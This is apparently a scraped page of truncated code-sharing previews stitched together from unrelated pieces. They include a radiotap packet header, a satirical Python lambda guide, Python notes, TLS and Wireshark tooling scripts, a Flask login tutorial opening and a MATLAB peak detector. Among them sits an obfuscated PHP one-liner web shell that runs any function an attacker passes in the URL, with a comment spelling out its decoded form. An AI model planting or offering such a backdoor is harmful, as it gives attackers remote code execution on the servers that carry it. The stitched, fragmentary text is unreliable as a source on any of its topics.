The dongle itself is sending out data using 802.11a (5 GHz WiFi) with OFDM and 6 Mbit/s data rate:
Radiotap Header v0, Length 38
Header revision: 0
Header pad: 0
Header length: 38
Present flags
########################################################### | |
# How to NEVER use lambdas. An inneficient and yet educa- # | |
# tonal [sic] guide to the proper misuse of the lambda # | |
# construct in Python 3.x. [DO NOT USE ANY OF THIS EVER] # | |
# original by (and apologies to): e000 (13/6/11) # | |
# now in Python 3 courtesy of: khuxkm (17/9/20) # | |
########################################################### | |
## Part 1. Basic LAMBDA Introduction ## | |
# If you're reading this, you've probably already read e000's |
# -*- coding: utf-8 -*- | |
# To list this file sections: $ grep '^"" ' notes.py | |
""""""""""""" | |
"" Why Python ? | |
""""""""""""" | |
- extremely readable (cf. zen of Python + [this 2013 study](http://redmonk.com/dberkholz/2013/03/25/programming-languages-ranked-by-expressiveness/)) | |
- simple & fast to write | |
- very popular (taught in many universities) | |
- has an extremely active development community |
#!/usr/bin/env python3 | |
# Extracts a subset of TLS secrets and injects them in an existing capture file. | |
# | |
# Author: Peter Wu <[email protected]> | |
import argparse | |
import os | |
import shlex | |
import subprocess | |
import sys |
#!/bin/sh | |
# This shell script is made by SyneArt <[email protected]> | |
####################################### | |
# BUILD WIRESHARK ON UBUNTU OR DEBIAN # | |
####################################### | |
# | THIS SCRIPT IS TESTED CORRECTLY ON | | |
# |----------------------------------------------------------| | |
# | OS | Wireshark | Test | Last test | | |
# |--------------------|----------------|------|-------------| |
<?=$_="`{{{"^"?<>/";${$_}[_](${$_}[__]); | |
// $_GET[_]($_GET[__]); |
(Task for GCI 2015-16) Year: 2015-16 This guide will show how to create a simple login page with Flask (a python microframework) and a sqlite3 database.
As we are creating a simple user login app we need to store 2 basic values in the database: the username and the password. In order to build the database we need to define a schema:
function [maxtab, mintab]=peakdet(v, delta, x) | |
%PEAKDET Detect peaks in a vector | |
% [MAXTAB, MINTAB] = PEAKDET(V, DELTA) finds the local | |
% maxima and minima ("peaks") in the vector V. | |
% MAXTAB and MINTAB consists of two columns. Column 1 | |
% contains indices in V, and column 2 the found values. | |
% | |
% With [MAXTAB, MINTAB] = PEAKDET(V, DELTA, X) the indices | |
% in MAXTAB and MINTAB are replaced with the corresponding | |
% X-values. |